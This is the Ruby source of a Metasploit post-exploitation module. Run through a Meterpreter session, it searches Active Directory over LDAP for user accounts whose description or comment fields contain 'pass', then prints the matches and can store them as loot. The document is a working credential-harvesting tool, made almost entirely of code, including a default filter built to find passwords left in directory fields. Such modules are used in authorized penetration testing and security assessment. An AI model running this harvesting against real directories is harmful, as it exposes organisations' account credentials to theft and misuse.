rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/post/windows/gather/enum_ad_user_comments.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
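class MetasploitModule < Msf::Post
  include Msf::Auxiliary::Report
  include Msf::Post::Windows::LDAP

  # Registers module metadata and the FIELDS / FILTER / STORE_LOOT options.
  #
  # MAX_SEARCH is read in #run but is not registered here; it presumably comes
  # from the Msf::Post::Windows::LDAP mixin (not visible in this file).
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows Gather Active Directory User Comments',
        'Description' => %q{
          This module will enumerate user accounts in the default Active Domain (AD) directory which
          contain 'pass' in their description or comment (case-insensitive) by default. In some cases,
          such users have their passwords specified in these fields.
        },
        'License' => MSF_LICENSE,
        'Author' => [ 'Ben Campbell' ],
        'Platform' => [ 'win' ],
        'SessionTypes' => [ 'meterpreter' ],
        'References' => [
          ['URL', 'http://social.technet.microsoft.com/wiki/contents/articles/5392.active-directory-ldap-syntax-filters.aspx'],
        ],
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [],
          'Reliability' => []
        }
      )
    )

    register_options([
      OptBool.new('STORE_LOOT', [true, 'Store file in loot.', false]),
      # Attribute names requested from the directory; whitespace is stripped in #run.
      OptString.new('FIELDS', [true, 'Fields to retrieve.', 'userPrincipalName,sAMAccountName,userAccountControl,comment,description']),
      # Passed to #query verbatim; the operator supplies a syntactically valid LDAP filter.
      OptString.new('FILTER', [true, 'Search filter.', '(&(&(objectCategory=person)(objectClass=user))(|(description=*pass*)(comment=*pass*)))']),
    ])
  end

  # Runs the LDAP query and prints one table row per matching user account.
  #
  # Output goes to the console and, when STORE_LOOT is set, to a CSV loot file.
  # Bind / request failures are reported with print_error and end the run.
  # Returns nil.
  def run
    fields = datastore['FIELDS'].gsub(/\s+/, '').split(',')
    search_filter = datastore['FILTER']
    max_search = datastore['MAX_SEARCH']

    begin
      q = query(search_filter, max_search, fields)
      if q.nil? || q[:results].empty?
        # Say so instead of exiting silently, so an empty run is distinguishable
        # from a run that never reached the directory.
        print_status('No user accounts matched the search filter.')
        return
      end
    rescue ::RuntimeError, ::Rex::Post::Meterpreter::RequestError => e
      # Can't bind or in a network w/ limited accounts
      print_error(e.message)
      return
    end

    # Results table holds raw string data
    results_table = Rex::Text::Table.new(
      'Header' => 'Domain Users',
      'Indent' => 1,
      'SortIndex' => -1,
      'Columns' => fields
    )

    q[:results].each do |result|
      row = []
      # An attribute that is unset on the account comes back as nil; render it
      # as an empty cell so the column count stays aligned with `fields`.
      result.each { |field| row << (field[:value].nil? ? '' : field[:value]) }
      results_table << row
    end

    print_line results_table.to_s

    if datastore['STORE_LOOT']
      # The description/comment columns are exactly where cleartext credentials
      # tend to appear, and the CSV is written as-is to the loot directory, so
      # handle the resulting file as sensitive.
      stored_path = store_loot('ad.users', 'text/plain', session, results_table.to_csv)
      print_good("Results saved to: #{stored_path}")
    end
  end
end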